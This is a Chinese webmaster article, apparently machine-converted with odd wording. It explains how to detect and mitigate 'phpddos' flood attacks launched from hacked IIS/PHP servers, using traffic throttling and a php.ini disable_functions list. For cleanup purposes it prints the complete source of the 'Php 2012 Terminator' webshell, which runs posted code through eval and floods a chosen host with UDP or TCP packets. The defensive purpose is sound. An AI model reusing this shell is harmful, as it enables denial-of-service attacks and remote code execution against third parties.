| 這類攻擊有一個最大的特性,就是上傳流量霎時增大,通常流量高達數十以至近百M,將整臺效 勞器,以至將整臺機柜的寬帶堵住,使網站無法運轉,而這樣的攻擊,我們無法從遠程處理,一但那個phpshell運轉,你的寬帶將被全部占用,遠程都無法 銜接。 被攻擊后能做的只要聯絡機房的工作人員,讓他進到你的效勞器里把你的IIS關掉,再沒查分明是哪個站點被入侵時,盡量一個站點也不要開,以免再 次遭到攻擊,怎樣看是不是這個攻擊呢,不能說關掉ISS好了,就是這種攻擊了,而要依據更精確的查看,才能夠肯定是什么問題,翻開360平安衛士,然后翻 開功用大全,到里面找到流量防火墻,在這里你能夠看到每一個進程的上傳和下載流量的幾,留意躲藏的系統效勞也要點開看一下,普通都是上傳超大才是 phpddos攻擊,而且普通都會在w3wp.exe和mysql.exe上傳流量會很大,最小也幾百M,最大幾G,好曉得是這個攻擊了,我們就來想方法 處理。 處理辦法: 1.應用360流量防火墻,把w3wp.exe和mysql.exe的上傳流量限制一下,依據你效勞器本身寬帶的狀況停止限制,普通限制在 200—300KB都沒什么問題,這樣就不怕phpshell發起大流量攻擊了,不過這個方法有一個缺陷,就是當你重新啟動效勞器時,你之前所限制 w3wp.exe和mysql.exe就不起作用了,要重新限制一下,用這個辦法的朋友一定要留意這一點。 2.經過更改php運轉環境來處理,翻開php.ini找到disable_functions=這項,然后把后面改成 gzinflate,passthru,exec,system,chroot,scandir,chgrp,chown,shell_exec,proc_open,proc_get_status,ini_alter,ini_alter,ini_restore,dl,pfsockopen,openlog,syslog,readlink,symlink,popepassthru,stream_socket_server,fsocket,fsockopen。 將allow_url_fopen = Off,再找到extension=php_sockets.dll這項,把前面加上分號,就是屏蔽掉這項。 3.經過查找攻擊源處理,批量查找一切網站內能否存在phpshell攻擊源代碼,源代碼為(由于代碼太亂以圖片方式展現給大家)如圖: 代碼如下: eval($_POST[Chr(90)]);set_time_limit(86400); ignore_user_abort(True); $packets = 0; $http = $_GET['http']; $rand = $_GET['exit']; $exec_time = $_GET['time']; if (StrLen($http)==0 or StrLen($rand)==0 or StrLen($exec_time)==0) { if(StrLen($_GET['rat'])<>0) { echo $_GET['rat'].$_SERVER["HTTP_HOST"]."|".GetHostByName($_SERVER['SERVER_NAME'])."|".php_uname()."|".$_SERVER['SERVER_SOFTWARE'].$_GET['rat']; exit; } echo "Php 2012 Terminator"; exit; } for($i=0;$i<65535;$i++) { $out .= "X"; } //Udp1-fsockopen Udp2 pfsockopen Tcp3 CC.center $max_time = time()+$exec_time; if($rand==53) while(1) { $packets++; if(time() > $max_time) { break; } $fp = fsockopen("udp://$http", $rand, $errno, $errstr, 5); if($fp) { fwrite($fp, $out); fclose($fp); } } else if($rand==500) while(1) { $packets++; if(time() > $max_time){ break; } $fp = pfsockopen("udp://$http", $rand, $errno, $errstr, 5); if($fp) { fwrite($fp, $out); fclose($fp); } } else while(1) { $packets++; if(time() > $max_time){ break; } $fp = pfsockopen("tcp://$http", $rand, $errno, $errstr, 5); if($fp) { fwrite($fp, $out); fclose($fp); } } ?> 經過批量查找網站內能否有類似上圖的源碼,找到后刪除,把網站權限設置為不可寫入,這樣在沒有修補好這個網站破綻前,不會再被植入木馬了。 |
免責聲明:本站部分文章和圖片均來自用戶投稿和網絡收集,旨在傳播知識,文章和圖片版權歸原作者及原出處所有,僅供學習與參考,請勿用于商業用途,如果損害了您的權利,請聯系我們及時修正或刪除。謝謝!
始終以前瞻性的眼光聚焦站長、創業、互聯網等領域,為您提供最新最全的互聯網資訊,幫助站長轉型升級,為互聯網創業者提供更加優質的創業信息和品牌營銷服務,與站長一起進步!讓互聯網創業者不再孤獨!
掃一掃,關注站長網微信
大家都在看
